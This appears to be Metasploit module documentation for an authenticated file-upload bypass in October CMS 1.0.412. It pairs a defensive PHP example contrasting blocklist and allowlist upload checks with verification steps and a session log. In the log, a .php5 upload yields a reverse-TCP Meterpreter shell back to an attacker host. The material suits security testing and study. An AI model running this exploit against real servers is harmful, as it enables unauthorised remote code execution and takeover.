Description
An authenticated user with permission to upload and manage media content can upload various files to the server. The application prevents the user from uploading PHP code by checking the file extension. It uses a blacklist-based approach, as seen in `octobercms/vendor/october/rain/src/Filesystem/Definitions.php:blockedExtensions()`.
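The difference between a blacklist check and an allowlist check on upload names, as an added example that is not October CMS code. The function names and both extension lists are constructed for illustration and are not the contents of `blockedExtensions()`.

```php
<?php
// Added example; not October CMS code. Both extension lists are constructed.
const BLOCKED_EXTENSIONS = ['php', 'php3', 'php4', 'phtml'];
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

// Blocklist style: any extension that is not explicitly listed is accepted.
function blocklistAllows(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, BLOCKED_EXTENSIONS, true);
}

// Allowlist style: returns the validated extension, or null to reject.
function allowedExtension(string $filename): ?string
{
    // No path components, control characters, or trailing dots/spaces.
    if ($filename !== basename(str_replace('\\', '/', $filename))
        || preg_match('/[\x00-\x1f]/', $filename) === 1
        || $filename !== rtrim($filename, '. ')) {
        return null;
    }
    $parts = explode('.', strtolower($filename));
    $stem = array_shift($parts);
    if ($stem === '' || $parts === []) {
        return null; // dotfile or no extension at all
    }
    // Every suffix must be allowed, so "a.php.jpg" is rejected as well.
    foreach ($parts as $suffix) {
        if (!in_array($suffix, ALLOWED_EXTENSIONS, true)) {
            return null;
        }
    }
    return end($parts);
}

// Store under a server-generated name so the client never controls the path.
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names; the .php5 one is the name from the session log on this page.
$samples = ['holiday.jpg', 'shell.php', 'WLMVDKmVpCX.php5', 'photo.PHP', 'a.php.jpg', 'notes.txt.'];
foreach ($samples as $name) {
    $ext = allowedExtension($name);
    printf("%-18s blocklist=%-6s allowlist=%s\n", $name,
        blocklistAllows($name) ? 'accept' : 'reject',
        $ext === null ? 'reject' : 'accept as ' . storedName($ext));
}
```

The allowlist is deliberately strict: a name such as `report.v2.pdf` is refused because `v2` is not an allowed suffix.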
Vulnerable Software
October CMS v1.0.412 (build 412) https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz
Verification Steps
- Install the application
- Start msfconsole
- Do: `use exploit/multi/http/october_upload_bypass_exec`
- Do: `set RHOSTS`
- Do: `set USERNAME <user>`
- Do: `set PASSWORD <pass>`
- You should get a shell.
Verification Steps
```
msf5 > use exploit/multi/http/october_upload_bypass_exec
msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
rhosts => 10.10.10.16
msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
verbose => true
msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/http/october_upload_bypass_exec) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
[+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
[*] Trying to Login ......
[+] Authentication successful: admin:admin
[*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
[*] Sending stage (38247 bytes) to 10.10.10.16
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530
[+] Deleted WLMVDKmVpCX.php5
meterpreter > sysinfo
Computer : october
OS : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
Meterpreter : php/linux
meterpreter >
```